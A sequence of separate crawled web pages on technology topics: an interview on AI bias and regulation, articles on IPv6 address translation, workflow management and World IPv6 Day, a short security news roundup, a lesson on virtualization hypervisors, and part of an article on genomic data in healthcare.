But let's face it. There aren't many people in the world that have to balance poles on carts. But as we move (laboratory) objectives into the real world, they start to matter.
Appian: You've also talked about something called supervised classification. What exactly is that, and how does it relate to AI?
Conitzer: That's a typical problem in machine learning. This is where we have lots of input data. For some of this data, we also have a label. For example, we may have lots of pictures, and some are labeled with who's in them. And we may want to give this data to an AI system and train it to determine, on its own, who is in each picture.
Appian: Is that the same process that's used in speech recognition systems?
Conitzer:Yes. So, you might have a speech recognition system that you try to train on data in speech files. The goal is to be able to transcribe speech that wasn't in the data set. And you hope that the AI will learn how to do that in the laboratory.
Appian: So, how do you know when it's ready for the real world?
Conitzer: Well, one way is to track the percentage of decisions the system is getting right. But when you deploy a system like this in the world, there can be other issues.
Maybe you do really well on the majority dialect in the population. But you do poorly on a minority dialect. So, you could end up placing some people at a severe disadvantage.
And this is the kind of thing that really does happen.I remember when my kids were small, they tried to speak to Siri in my wife's iPhone. And it was amazing how wrongly it interpreted what they were asking. There probably weren't many children in their data set, so Siri didn't do well with my kids. So this wasn't a big deal. But you can think of other cases where this would be a serious problem.
Appian: Can you give some examples of that?
Conitzer: For example, tech companies like Google and Facebook want people to sign up for accounts. But they also want to detect accounts that don't correspond to real people. So, they ask for a person's name and other information to authenticate their identity. And one of the things that they try to do is figure out which accounts don't correspond to a real person.
So one of the factors you take into account when trying to determine if a person is real is their name. And it turns out that many Native American names share features with accounts that tend not to be real.
Appian:Can you give an example of that?
Conitzer: The names may have more words in them, which could be indicative of a fake account. So, Native American accounts were being classified as not real significantly more often than other customers.
Appian: So, the AI didn't spot the misclassification?
Conitzer: No, the AI system didn't understand any of the broader context of this. So, it unfairly disadvantaged an entire community of consumers.
So this is the kind of thing that we've got to be careful with, because simple objectives don't always give you good outcomes.
Appian: So, how do we guard against that kind of unintentional bias? How do we prevent it?
Conitzer: It's a difficult question. It's even hard to determine what we mean by a system that doesn't have any bias. There are different definitions that aren't always equivalent. So, there's that problem in the first place. But sometimes it's just obvious that something has gone wrong. I don't think there's a single method to eliminate AI bias.
I think it's good to have a diverse group of people involved in the creation of the software and inspecting the software.
The software should be tested for bias before it's deployed, so it doesn't create some of the bad outcomes we've been talking about.
Appian: On the topic of ethics, transparency and accountability, where do you come down on debate around regulation and AI. Should it be regulated? Or will regulation stifle innovation in the evolution of AI?
Conitzer: I'm not opposed to regulation. I think you have to look at it on a case by case basis. When you use AI to predict which ads somebody sees, that's different than using AI to decide whether or not somebody gets out on bail. Or if you're using AI to recommend sentences for people convicted of crimes.
When you regulate AI, you should have a good understanding of what the systems actually do, and what you're trying to achieve with the regulation.
The problem with hasty regulation, where people don't understand what they're regulating and why, is that it's not likely to be beneficial.
But there are cases where regulation is appropriate. When you're talking about law enforcement, and you're trying to decide whether somebody gets out on bail, these AI systems should be transparent and accountable.
Appian:Speaking of accountability, there's a strong debate going on around AI and accountability. What do you make of that debate?
Conitzer: Think about self-driving cars. When an accident happens, who is responsible? That can be a difficult question. We have clear traffic rules, and we know what's expected. When AI systems take over, and something bad happens, it's sometimes more difficult to decide exactly what went wrong and where to assign responsibility.
Is the original programmer at fault, or perhaps it's the fault of the person who provided the data that the system was trained on? These are tricky questions that people in the legal world are thinking about very hard.
Appian: You've heard the hype around AI. Of all of things that you've read about, what's the biggest misconception about the capabilities of AI?
Conitzer: I think on one hand, there's been tremendous advancement in the evolution of AI. So, the fact that progress has been made isn't a misconception. That said, I think people tend to extrapolate a little too far. One of the tricky things in AI has always been that what we perceive as things that really require intelligence aren't always the things that are hard for AI systems to do.
Appian: Can you give us some examples of this AI myth?
Conitzer: Before AI, in the early days of computer science, we may have thought that the game of chess was reflective of the highest form of human intelligence. We assumed that someone who plays chess well is really an intelligent person. But later on, we found out that playing chess might be easier than playing soccer. There are people working on AI soccer. You should look at the work they're doing. It can be very entertaining.
The point is that our own concept of where we're intelligent in ways that other things aren't has changed as a result of AI research.
Sometimes this comes at the frustration of AI researchers, because if they solve a problem that's deemed to be a benchmark for AI, the bench-marking goal post gets moved. Which leads to frustration from the people who solved it.
Appian: So our own concept of what is unique about being human is always shifting, as a result of AI research.
Conitzer: Yes, but will it always be that way? I don't know.There are people who are genuinely concerned about AI becoming broadly more intelligent than humans. Not just on narrow tasks, but AI that is equally flexible and as broad in understanding as humans. There are all kinds of disaster scenarios that can unfold from that.
Appian: What do you make of that fear of general AI?
Conitzer: It's been difficult for the AI community to approach that question.
The AI community used to make bold predictions. But many of them didn't come true, because solving the problems was harder than people thought.
So, the community has pulled back from making bold predictions.
Appian: But people outside of the community have started to raise those concerns.
Conitzer: Yes, but the issue of timing is important.
Some concerns are really on the horizon right now, like autonomous weapons, technological unemployment, bias in algorithms.
These things are happening right now. And we need to be concerned about them. But AI taking over the world? That's more futuristic.
Appian: So, AI taking over the world is not something we need to worry about today?
Conitzer: Today's algorithms can't achieve that. It's not crazy to think about those things. So, I'm supportive of the people who do. But it's important to keep in mind that we're talking about different time scales and different levels of uncertainty.
Appian:Speaking of the future, as you think about 2019 and beyond, what do you expect to see in terms of AI trends, especially as it relates to ethics and accountability?
Conitzer: Near term, we'll see a lot of successes achieved on the machine learning side and pattern recognition techniques. I think we'll start to see them deployed in the real world in many different places. As that trend happens, it will also generate new problems that people didn't anticipate.
Appian: Can you give us an example?
Conitzer: Yes, one will be that just recognizing patterns may not be enough. We're already seeing this in self-driving cars.
The AI systems in our cars don't just detect patterns, but they're also capable of taking corrective action, based on what they perceive. We're going to see much more of this kind of AI in the near term.
Appian: And how does ethics fit into that narrative?
Conitzer: Generally, these systems will require you to specify some high-level objective to pursue. Any C-level executive knows that the objective that you give someone to pursue should be specified in the right way. Or you won't get the results that you expect.
The same is true of AI systems: If you specify the wrong objective, you may be surprised by the outcome that you get.
Appian is the unified platform for change. We accelerate customers’ businesses by discovering, designing, and automating their most important processes. The Appian Low-Code Platform combines the key capabilities needed to get work done faster, Process Mining + Workflow + Automation, in a unified low-code platform. Appian is open, enterprise-grade, and trusted by industry leaders. | <urn:uuid:61f278a3-aafd-4904-a36d-13396b4182d1> | CC-MAIN-2022-40 | https://appian.com/blog/2019/will-ai-make-humans-obsolete-not-in-the-short-run-part-2-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00594.warc.gz | en | 0.972651 | 2,623 | 2.71875 | 3 |
Plain talk about the Advantages and Disadvantages of NAT
By Owen DeLong and Scott Hogg
Dual stack is the most preferred IPv6 transition strategy and tunneling IPv6 packets within IPv4 packets is considered less optimal.
Of all the IPv6 transition techniques that exist, “Translation” is considered the least attractive.
IPv6 purists and protocol designers have long resisted the idea of allowing NAT for IPv6.
Yet today there is a function called Network Prefix Translation (NPT) which is similar to NAT, but different.
This article goes into detail about the reasons to use NAT, the disadvantages NAT brings, and seeks to help the reader make an informed decision about what is right for their particular environment.
You may have seen this popular and amusing video on this subject: http://www.youtube.com/watch?v=v26BAlfWBm8 hits remarkably close to the mark. IPv6 proponents have significantly resisted allowing NAT to be used with IPv6. The fear is that there would be demand for a system similar to what is used for IPv4 where many private IPv4 addresses are hidden behind a single public IPv4 address (Technically known as NAPT (Network Address and Port Translation, or PAT (Port Address Translation) for short). The concern is that PAT would ruin the end-to-end model that IPv6 has so long hoped to restore. The original intent of IP communications was that hosts would communicate directly using their assigned IP addresses. Since translation changes the source address of the packet on its way to the destination, the destination is not communicating with the original source address. This type of PAT system is not needed for IPv6 because there is no scarcity of IPv6 addresses.
Are there Private addresses for IPv6?
IPv4 has RFC-1918 addresses that can be used in private networks isolated from the Internet. IPv6 also provides for a type of “private” addressing. Unique Local Addresses (ULA) are addresses that an organization can use for non-Internet communications on private networks.
Unique Local Addresses (ULA) are documented here: http://tools.ietf.org/html/rfc4193. This FC00::/7 address block has been allocated by the Internet Assigned Number Authority (IANA) and is broken into FC00::/8 which is reserved and FD00::/8 which organizations can use internal to their organizations. The RFC stipulates that organizations must generate a 40-bit random number to fill in the bits after the “FD” hex digits. The first 8 bits for “FD” (1111 1101) combined with the 40-bit random number provide for a /48 prefix that can be sub-netted and used inside an organization’s internal networks.
The generation of the random number should prevent any possible conflicts between organizations who are also using ULA space internally. The random number gives the “unique” aspect of unique-local. Therefore, two organizations can collaborate or merge and there probably won’t be any address overlap situations like occur today with RFC-1918 IPv4 addresses.
Limitations/restrictions of ULA space are similar to the usage limitations of RFC-1918 addresses. They can be routed between organizations by agreement, but should not generally be leaked into internet routing tables. As noted above, they do not suffer from the limitation on uniqueness that RFC-1918 addresses have. These ULA addresses are only intended to be used internally and never used for Internet communications. Hence the word “Local” in the ULA name.
When might NAT be useful for IPv6?
IPv6 was originally intended to use a completely hierarchical addressing system where organizations received their IPv6 addresses from their service providers. However, that didn’t easily allow for multi-homing to multiple ISPs. Many enterprise organizations use BGP today to advertize their own public IPv4 addresses to multiple ISPs and have independence. That hierarchical addressing requirement has been lifted and organizations may be granted Provider Independent (PI) IPv6 address blocks if they meet the requirements by the Regional Internet Registry (RIR). PI IPv6 addresses used with BGP for multi-homing just like an organization’s public IPv4 addresses. Each RIR has their own specific requirements. As an example, to qualify in the ARIN region, you must meet one of the following criteria:
- Operate critical Infrastructure (Root nameservers, Exchange points, etc.)
- Be multi-homed or immediately becoming multi-homed. (Hold an ASN and 2 or more peering or transit contracts)
- Have a network that makes active use of at least 2000 IPv6 addresses within 12 months
- Have a network that makes active use of at least 200 /64 subnets within 12 months
- Provide a reasonable technical justification indicating why provider assigned addresses would be unsuitable to your application.
However, smaller organizations that only have a single ISP today will likely be granted only Provider Assigned (PA) IPv6 addresses from that ISP’s block. These smaller organizations will be forced with IPv6 re-addressing if they chose to switch service providers. Customers may need to quickly switch service providers and may not have ample time to renumber. However, IPv6 does make it relatively easy to run multiple sets of addresses in parallel, so if you have any warning of an ISP change and can deploy the new addresses early in the process, there are very good tools for managing the deprecation of the old addresses in an orderly fashion. In other words, readdressing an IPv6 environment is easier than readdressing an IPv4 environment.
Some organizations today use multiple upstream ISPs and obtain IPv4 address blocks from each of those ISPs. They use these public IPv4 addresses on the external interfaces of their firewalls to PAT outbound connections. Their internal network systems use private IPv4 addresses and exit to the Internet through one of these Internet egress points using PAT. Their IPv4 address comes back symmetrically due to the use of public IPv4 addresses from the ISPs. These organizations are multi-homed, but are not using BGP, do not have their own IPv4 addresses, and are relying on NAT as a somewhat limited substitute for BGP routing. These organizations will not have the same functionality with IPv6 because there is no PAT-like function defined for IPv6. However, any such organization would easily qualify for IPv6 Provider Independent (PI) addresses and setting up a minimal BGP connection is no longer very difficult. Any organization in this situation should seriously consider moving to BGP routing as it is the most flexible solution and does not have to be expensive or difficult, contrary to popular belief.
However, if address translation is required in your environment, the IPv6 version is known as “Network Prefix Translation” (NPT) and is documented here: http://tools.ietf.org/html/rfc6296
In NPT, only the prefix (e.g. The /48) is translated and not the subnet or interface identifier. For example, if you have an internal range of fd20:010d:08b5::/48 and an external prefix from your first provider of 2001:db8:beef::/48 and your second provider gives you 2001:db8:cafe::/48 and you have a host which internally is numbered fd20:010d:08b5:babe::8:beef, the external presentation of that host to provider 1 would be 2001:db8:beef:babe::8:beef and to provider 2 would be 2001:db8:cafe:babe::8:beef. Notice only the first 48 bits changed from the internal representation. The remaining digits remained identical.
NPT is not called NAT66, in an effort to avoid confusion with PAT-based NAT44, since NPT operates significantly differently from PAT. NPT performs a one-to-one mapping of IPv6 addresses. It does not provide overloading like IPv4 PAT and it does not use a “pool” of public addresses. NPT can provide increases security and forensics because of the one-to-one mapping due to the large amount of available IPv6 addresses. IPv4 could not use a system like this because IPv4 addresses are becoming increasingly more scarce.
The challenge today is that many network devices do not yet support NPT for IPv6. Manufacturers of routers and firewalls have many IPv6 features, but they have yet to include NPT as one of their default options. However, it is likely that in the next year, manufacturers of routers and firewalls will integrate NPT into their software.
What about the security I get from NAT?
Many people who learn about how IPv6 will be deployed to residential broadband CPE devices are concerned about the fact that their internal systems will receive public IPv6 addresses. They are concerned that this is leaving them open to attack from the Internet. NAT has been used in IPv4 environments for “topology hiding” of the internal IPv4 addressing because the systems on the Internet only see the source address of the NAT pool or the PAT system’s single public IPv4 address. IPv6 makes this irrelevant, topology hiding is not a necessity. IPv6 address space is so immense that tracking one system’s source address, particularly if it changes periodically, is a difficult task. Just like the IPv6 nodes are sparsely scattered within a single /64 subnet, IPv6 subnets are also sparsely allocated.
More general information on Local Network Protection for IPv6 RFC 4864 is documented here: http://tools.ietf.org/html/rfc4864
In reality, it is important to develop a better understanding of how “NAT Security” actually works in a home gateway. There are two components to PAT. One (the component that provides security) is a stateful correlation of inbound packets to existing outbound flows. The second component is the one that rewrites parts of the header based on the contents of those state tables (which doesn’t actually provide any security at all). The first part is technically known as “stateful inspection”. Technically NAT or PAT refers only to the second component (the rewriting of the packet header), but because NAT/PAT requires stateful inspection to operate, the terms are often used to refer to the combined process. Unfortunately, this has created the false perception that NAT/PAT provide security.
Stateful Inspection (the part that provides the security) is readily available in most IPv6 Customer Premise devices, but you should make sure that your device has it. With stateful inspection, your public addresses are every bit as safe as your private addresses were in IPv4.
The reality is that the CPE, local gateway will still perform stateful filtering and prevent inbound Internet connections. The Cable Modem with embedded router (eRouter) or Linksys/D-Link/NetGEAR device that the subscriber purchased will allow upstream connections that were initiated from the internal home network but it would prevent unsolicited inbound connections from the Internet. The CPE router will still act as a “stateful” firewall even though the IPv6 addresses allocated to the home use global unicast addresses. Following are two RFCs that govern how CPE devices do not use NAT/PAT for IPv6 in the same way NAT/PAT is used for IPv4.
Basic Requirements for IPv6 Customer Edge Routers, RFC 6204, http://tools.ietf.org/html/rfc6204
Recommended Simple Security Capabilities in Customer Premises Equipment (CPE) for Providing Residential IPv6 Internet Service, RFC 6092, http://tools.ietf.org/html/rfc6092
How do ISP’s assign addresses to customers?
For dedicated Internet connectivity customers, an ISP may elect to allocate the customer with a /48 Provider Assigned (PA) IPv6 block from the ISP’s /32-or-larger IPv6 block. DHCPv6 Prefix Delegation (PD) is used as the method to allocate global unicast IPv6 prefixes to the subscriber’s CPE device for use internal to that subscriber’s location. The prefix delegated to the customer could be as large as a /48, which provides for significant flexibility and future-proofing on the end-user side, or any longer value up to a single /64 which would be the most restrictive (only one subnet) value that can be given to an end-user. Service providers could elect to allocate a single /64 for residential broadband subscribers and allocate larger prefixes up to and including a /48 for their business-class customers. The challenge today is that may consumer-grade CPE devices only support receiving a single /64 prefix which restricts the number of subnets a customer can have within their location. Consumer electronics manufacturers are continuing to educating themselves about IPv6 and will be producing products capable of IPv6 subneting.
What about cross-protocol Translation?
Running IPv4 and IPv6 simultaneously (dual-stack) is the preferred transition strategy. However, it is not always feasible to deploy IPv6 this way. Tunneling IPv6 packets over through an IPv4 cloud is less optimal, but can be used as a last resort method. Translating IPv6 and IPv4 packets is considered undesirable but it is ironic that there is so much effort being put into translation techniques.
There are many forms of translation intended for “transition”. Most of them do more to hinder transition than help in most circumstances. A detailed discussion of these is out of scope for this document, but if you want to find more information, search for one or more of the following terms:
Even though Network Prefix Translation (NPT) exists, your organization should be using global IPv6 addresses and relying on stateful packet filtering and other diverse approaches for security. NAT66 does not exist and you do not need PAT for IPv6 because there is no scarcity of IPv6 addresses. You will be able to provide the same security for IPv6 Internet communications as you do today for IPv4 and you will have a simpler environment to maintain with the use of NAT. Without NAT for IPv6, end-to-end communications will be much easier to troubleshoot using public addresses for the source and destination systems.
Owen DeLong and Scott Hogg | <urn:uuid:7930994b-0701-4af5-851a-3f2dcb0f85a7> | CC-MAIN-2022-40 | https://blogs.infoblox.com/ipv6-coe/ipv6-nat-you-can-get-it-but-you-may-not-need-or-want-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00594.warc.gz | en | 0.934396 | 3,033 | 3.109375 | 3 |
What is a Workflow?
Why workflow management systems are important for organizations
What is a workflow?
A workflow is a set of steps necessary to accomplish business objectives and is visually outlined through diagrams and charts. Workflows are used across businesses to operate more transparently, effectively and with faster time to ROI.
The three components of a workflow
- Input: The start of a workflow, which involves either resources (documents, forms, etc.), tools or employees that are essential to complete steps in this process.
- Transformation: All the actions that are triggered from the input and changes that lead to the output.
- Output: The result of the transformation. Alternatively, the output can serve as the input for the next step in upcoming workflows.
Types of workflows
- Sequential workflows are chart-based, and the completion of a specific business task depends on the previous step.
- State machine workflows could go back and forth in between workflow steps — and are often seen in processes that involve many stakeholders or rely on feedback from key decision makers.
- Rules-driven workflows are executed based on sequential workflows with varying and complex tools to determine success.
Differences between workflows, processes and checklists
The difference between an automated and manual workflow
In a manual workflow, each step can only progress with human involvement. Automated workflows use process automation technology to assign tasks and route documents. Automated workflows are quicker and more accurate than manual ones. They also utilize process automation technology to assign tasks and route documents with greater speed — minimizing the need for manual, repetitive steps that bog down processes.
HR and employee onboarding
Manual, repetitive administrative activities can reduce any HR department to frustrating processes of paper-chasing and switching back and forth between systems. With the help of workflow automation — HR can simplify:
- Onboarding new employees
- Training new recruits
- Approving or denying annual leave requests
- Managing harassment claims
- Investigating safety incidents
- Simplifying employee document acknowledgment
IT service requests
When it comes to making work easier for your IT teams, a connected workflow system gives them the ability to resolve issues or roll out updates faster with a complete view of all the crucial information needed.
Accounts payable (AP)
It’s becoming increasingly expensive to process paper invoices, and the cost multiplies when you add manual data entry to the mix. Automated invoice workflows, however, deliver accurate information to the hands of the right stakeholders across an organization — for faster reviews and approvals to take place before confirmed data is posted into respective financial systems. Specific to the AP journey, deploying workflows can:
- Standardize AP processes across an organization to eliminate confusion
- Go paperless with electronic data capture tools
- Minimize delays and allow for faster information access
What are workflow charts and how are they created?
Workflow charts (also referred to as workflow diagrams) are graphic representations of the sequential steps that must be executed to successfully complete a task, accompanied by the specifics of what must occur and in which sequence.
What does a workflow chart look like?
Best practices when creating a workflow chart include:
- Narrow down the very first workflow trigger, followed by what a successfully completed task looks like.
- Branch out from your first “trigger” and map out each subsequent step from the start to the end of a task.
- Identify and outline the resources needed. These could come in the form of documents, employees responsible or key decision-makers that will accelerate processes.
- Execute this workflow. For faster completion, identify potential bottlenecks in the workflow and breakdown alternatives if they do occur to ensure that processes continue.
- Introduce automation to your workflow to boost productivity and eliminate the risks of error-prone manual entries.
What is a workflow management system and how does it work?
Workflow management automates processes, sharing work efficiently between workers and matching them with the best task for their respective skillset and job functions.
In a higher education admissions setting, for example, this would mean that, after a college application was put into a workflow automation software, it would be electronically routed to the right staff member. That could be based on workload, specialization or any other factor the university decided.
Supporting material such as transcripts and essays could be attached and easily retrieved, which would free staff from the low-value tasks of hunting for loose paper documentation.
Once they’re done with their work, the work task is automatically routed to the next worker.
What are the benefits of a workflow management system?
Workflow management systems benefit organizations that are challenged with:
- Employees spending too much time searching for documents
- Some employees who are swamped with work, while others are idle
- Busy decision makers causing bottlenecks in the process
- Employees cherry-picking work (most interesting, most valuable to them, etc.) to the detriment of corporate goals
A workflow management system solves the above challenges — with agile tools that support faster routes to documents, efficient processes and minimal manual involvement. These can result in:
Reduced risks in project management
Workflows that are efficient ensure that schedule delays are kept to a minimum. Organizations also minimize the productivity losses that come with not having a centralized location to store, share and access the documents required to move the workflow along.
Increased accountability with clearer role definitions
With a visible workflow in place, it becomes easier for team members to see who’s in charge (or just involved) in specific sequences — so there is no confusion about task responsibilities and when to get them done.
Transparent monitoring of all critical missions
Every crucial stage of the workflow can be instantly examined to make sure there are no problems holding teams back from completion. This will greatly benefit project managers when they need to assess how smoothly the procedure is going from start to finish.
Solid regulatory compliance
Solid workflow trails outline each step showing how goals are achieved, supporting compliance efforts and enabling a transparent line of accountability across organizations.
High-caliber customer service experiences
Organizations that implement workflow automation can free up their employees to focus on higher-value tasks like delivering better customer experiences.
Using OnBase to streamline workflows
Hyland’s business process automation solutions are built to optimize manual, repetitive activities that slow down workflows across an organization.
This is done through OnBase, an enterprise information platform that allows organizations to make critical decisions faster by automating specific tasks and empowering employees to focus on delivering better customer experiences and other high-value goals. OnBase helps with:
- Creating and simplifying workflows with an automated approach to complex processes
- Gathering accurate information with customizable electronic forms
- Accelerating document reviews and approvals
- Identifying process bottlenecks, non-compliant situations and anomalies with a process mining tool | <urn:uuid:9795c48e-40af-4852-bb2c-63d4dcc1d7ab> | CC-MAIN-2022-40 | https://www.hyland.com/en/resources/terminology/workflow | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00594.warc.gz | en | 0.930477 | 1,418 | 3.109375 | 3 |
Tomorrow, the world will make one more historic move from the networking address protocol known as IPv4 to IPv6. Last year’s 24-hour test now becomes permanent as IPv6 will be turned on and will remain running for participating organizations.
What does this mean and why should you care?
Well, in some ways it speaks to the phenomenal growth of the web and how much our lives have quickly changed.
To transfer data over the internet, packets are routed using routing protocols, which are essentially an address system for each addressable device. The current address system we have in place is known as IPv4 (e.g. A.B.C.D or four nodes) and has 232 or about 3 billion addresses available. Or I should say had available.
In February 2011, the last block of top level IPv4 addresses were granted. Now, all of these aren’t necessarily in use. The amazing thing is that in the short time of the internet, we saw billions of IPv4 addresses assigned. Essentially, the internet as we know it was about to run out of space. Too many cars on the road, as it were.
To change that, a number of years ago, the IPv6 protocol was established using 128 bit (e.g. A.B.C.D.E.F or six nodes), rather than 32 bit addressing options. This expands the potential amount of addresses on the internet from 232 to 2128 addresses.
So what does this mean for your company? Well, at some point if you don’t prepare for the switch you may begin to experience some hang ups and some sticky patches. Simply put, you are going to need to make the switch to IPv6 or at least run parallel systems. The great news is that Websense web security solutions are already IPv6 capable, so you can keep your networks safe from malicious, advanced threats and data loss over the web.
What else do you need to do to prepare? Well, InformationWeek has a great article on recommendations to make the switch in your business. As a fun aside, a quick question for you. What is the strangest internet addressable object you have ever come across? A toaster? A toilet? Let us know what kind of crazy connectivity you have found in the comments below. | <urn:uuid:e1102090-ecbf-495e-ad9b-f1b2bab376a8> | CC-MAIN-2022-40 | https://www.forcepoint.com/blog/insights/world-ipv6-day-internet-expands | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00594.warc.gz | en | 0.954837 | 474 | 2.734375 | 3 |
With the advent of machine learning and artificial intelligence (AI), amazing progress has been made in terms of having computers do more of our work for us. However, offloading work to computers and algorithms comes with a hidden danger. When decision-making power is handed from people to algorithms, the decisions are suddenly assumed to be correct and immune to bias, even though this is far from the truth.
Not only can algorithms dangerously simplify complicated real-world situations to yes/no decisions or single numbers, but over-confidence in the accuracy of an algorithm can remove any kind of accountability or ability to second-guess a computer’s decision.
One example from nearly two years ago is a ProPublica report on racial bias, in a system used to calculate risk scores for people as they are processed through the criminal justice system. In their research they found that these systems assigned higher risk scores to African-Americans, and that these systems were widely used, sometimes at every point of the process in the criminal justice system.
Another interesting “gotcha” of AI is adversarial input - an active area of research regarding various ways and means to fool different AI systems. Here is a 3D printed turtle designed to fool Google’s inception v3 image classifier into thinking it’s a rifle, and this is a sticker designed to fool the VGG16 neural network into thinking a toaster is the subject of an image, regardless of what else is present.
Meanwhile, AI is being swiftly applied to everything that can’t get up and run away from a data scientist: analyzing military drone footage, determining who to search at the border, various aspects of crime-fighting, and secretive police facial recognition programs. While moving decision-making work towards computers and away from humans may appear to remove human bias from important decisions, we risk hard-coding existing bias into unquestionable and un-auditable algorithms.
If we’re going to leverage AI in making social decisions, we need to take great care to take that input with a healthy dose of skepticism and context.
Shutting Down E-Stalkers
Stalkers have long been a problem, and have grown adept at using technology to track their victims. The most recent instance of this is the growing proliferation of “dual-use” tracking applications, often dubbed spyware or stalkerware. While marketed as legitimate applications to track children or family, these apps are all too often used without the tracked person’s knowledge or consent, such as spying on a partner’s private texts in an attempt to uncover suspected cheating.
However, someone has apparently found an alternative solution by just repeatedly hacking a stalkerware provider until they shut down.
While this might help the victims who are being tracked without their consent by this particular service, the full problem is social and not easily handled with technical solutions. Learning to spot the tell-tale signs of stalkerware on your smartphone or personal computer is a good start. Even better is knowing how to spot red flags in a relationship that can be warning signs of abusive behaviors, and learning how to reach out to others for emotional support and physical help to get out of bad relationships.
“Alexa, Creep Me Out In The Middle Of The Night”
Tying the previous two stories together, we are now hearing reports of Amazon Alexa units creepily laughing at people for an unknown reason. The working theory is that the unit mistakenly thinks the users says “Alexa, laugh”, but there are also reports of units laughing spontaneously.
No word yet on if they laugh when nobody is around to hear them laugh, or if Amazon is working on a Poltergeist-as-a-Service (PoiP) that is simply being rolled out to select users as a test. I was unsettled enough at the thought of an always-on microphone in my house, but unprompted tauntings are enough for me to flee to the woods.
All that said, keep your ears perked for your own Alexa unit to try scaring you, since it seems likely Amazon will exorcise the issue before too long. | <urn:uuid:20d2dda4-7076-4d08-9662-4f0899a7e576> | CC-MAIN-2022-40 | https://blogs.blackberry.com/en/2018/03/this-week-in-security-ai-bias-stalker-apps-ai-laughing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00794.warc.gz | en | 0.953246 | 858 | 2.796875 | 3 |
Virtualization mechanism has key components. In this CCNA Certification lesson, we will focus on these virtualization components in a Virtual Network Infrastructure. So, what are the key components of Virtualization? These three components of Virtual Network Structure are given below:
Now, let’s talk about these Virtual Network Infrastructure Components detailly.
The first cokmponent of Virtual Network Structure is Host Machines. A Host Machine is the physical hardware that the virtual machines reside. It is the device that has physical resources like memory, storage, processor etc. These resources are used by virtual machines according to their configuration during the virtualization process. Host machines are the physical devices that runs virtualization software that create and manage virtual machines.
The other Virtual Network Structure component is Virtual Machine. A Virtual Machine is the virtual device that resides in Host machine. It emulates s single physical device but as virtual. In other words, a Virtual Machine is created with the resources that it needs virtually in Host Machine. Each virtual device thinks that, it is the only device in the system. But there can be many different virtual devices in the host machine. The main aim of virtualization is already this multiple usage.
A Virtual machine can be a PC, a server, a router, a firewall etc. According to your need, you can create a virtual machine in physical host machine and create small virtual machines in it.
The communication between the host machine and virtual machines are done via Hypervisor.
The last Virtual Network Structure component is Hypervisor. A Hypervisor is the key part of virtualization. In other words, Virtualization is commonly hypervisor-based. It is also called Virtual Machine Manager. Hypervisor is basically is a software that is used to create and manage virtual machines in the host machine. The main purpose of Hypervisor to manage the virtual devices and provide them necessary system resources
There are two types of Hypervisors according to their working style. These are given below:
Type 1 Hypervisor or Bare-Metal Hypervisor is the software that is directly installed and run on the top of the physical hardware, host machine. They have their own operating system. This type of Hypervisors is used mainly on data center devices.
The advantages of Type 1 Hypervisor (Bare-Metal Hypervisor) are high availability, better performance and scalability. Because they can access system resources directly.
VMWare ESXi and Hyper-V can be given to this type of Hypervisors.
Type 2 Hypervisor or Hosted Hypervisor runs on the operating system directly installed on the hardware instead of running directly on the hardware as Type 1. In this system, each Virtual Machine runs over the Hypervisor. This type of Hypervisor is generally used to run multiple operating system in the physical hardware. There is a one operating system and Hypervisor resides on it. And it allows us to create multiple operating systems on it.
There is no need for a management console software in Type 2 Hypervisor (Hosted Hypervisor). This is an important advantage. So, this makes this type Hypervisor more popular.
VMWare Workstation, VirtaulBox, Virtual PC, VMware Fusiona and Mac OS X Parallels are the examples of Type 2 Hypervisors (Hosted Hypervisors).
We have talked about the key Virtualization components of the Virtual Network Infrastructure. We have focused Host machine, Virtual Machine, Type 1 Hypervisor and Type 2 Hypervisor. | <urn:uuid:f4047cff-def4-4b2b-8c21-f54bf6f46aa8> | CC-MAIN-2022-40 | https://ipcisco.com/lesson/virtual-network-structure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00794.warc.gz | en | 0.894246 | 703 | 3.40625 | 3 |
Shaping healthcare’s future with genomic data
The costs of genome sequencing are also influenced by the nature of genomes themselves, which are paradoxical in that they’re both unique yet highly similar in people. “You don’t usually have to sequence the whole genome,” Hunter explained. “You can look for particular markers. Human beings are 99.9 percent identical with each other at the sequence level. So we can just look for the parts that are different.” Focusing on common areas of differences in genomes is known as genotyping, which increases the efficiency of sequencing genes for both research and clinical purposes.
From research to clinical care
Spurred in part by the decreased costs of analyzing genomes for mutations, which contribute to healthcare conditions, genetic data is in the process of transitioning from research settings to clinical use. The University of Colorado incorporates genotyping and genome sequencing for clinical care of patients at both a children’s and adult hospital—Children’s Hospital Colorado and UC Health respectively. RDConnect’s Scientific Advisory Board (a European rare diseases council of which Hunter is a member) has been building out infrastructure to diagnose children with rare diseases. “It’s by far the most effective tool at this point for kids with an undiagnosed problem or detecting disease early,” Hunter said. Clinical usage of genomic data is aided by exomes, which Hunter described as “the part of a genome that will be translated into a protein. Most of the genetic changes, not all of them, that will cause disease cause a change in the protein part.” Exome sequencing increases the productivity of genotyping, which makes genome sequencing much more viable in clinical settings than it was before.
Scale and processing power
The need to compile a host of unstructured, semi-structured and structured data from both internal and external sources presents massive challenges for those working with genetic data. That diversity fuels questions of compute power and scale, each of which is critical to such an undertaking. “As these modern sequencing machines generate their data, you’re talking about reams of a hundred to thousands of terabytes,” said Tom Plasterer, head of research of the Research Development Group at AstraZeneca.
AstraZeneca is attempting to counteract afflictions related to cardiovascular, cancerous, metabolic, respiratory and other issues as part of its role in a global genomic initiative attempting to sequence 2 million samples in the next several years. The magnitude of the data is multiplied when working with certain conditions such as cancer, which frequently requires sequencing both normal and cancerous cells to identify variants. “Right there you’re faced with a huge computational problem where you need to reassemble those genomes,” Plasterer said.
AstraZeneca accounts for those processing demands with elastic computing resources in the cloud, which scale up or down as needed “for additional compute power and then go back to an environment where we’re not paying for all those systems when we don’t need them,” Reinold explained. Additional cloud benefits include compression techniques for more cost-effective storage and the means of accessing data from multiple locations.
Integration and aggregation
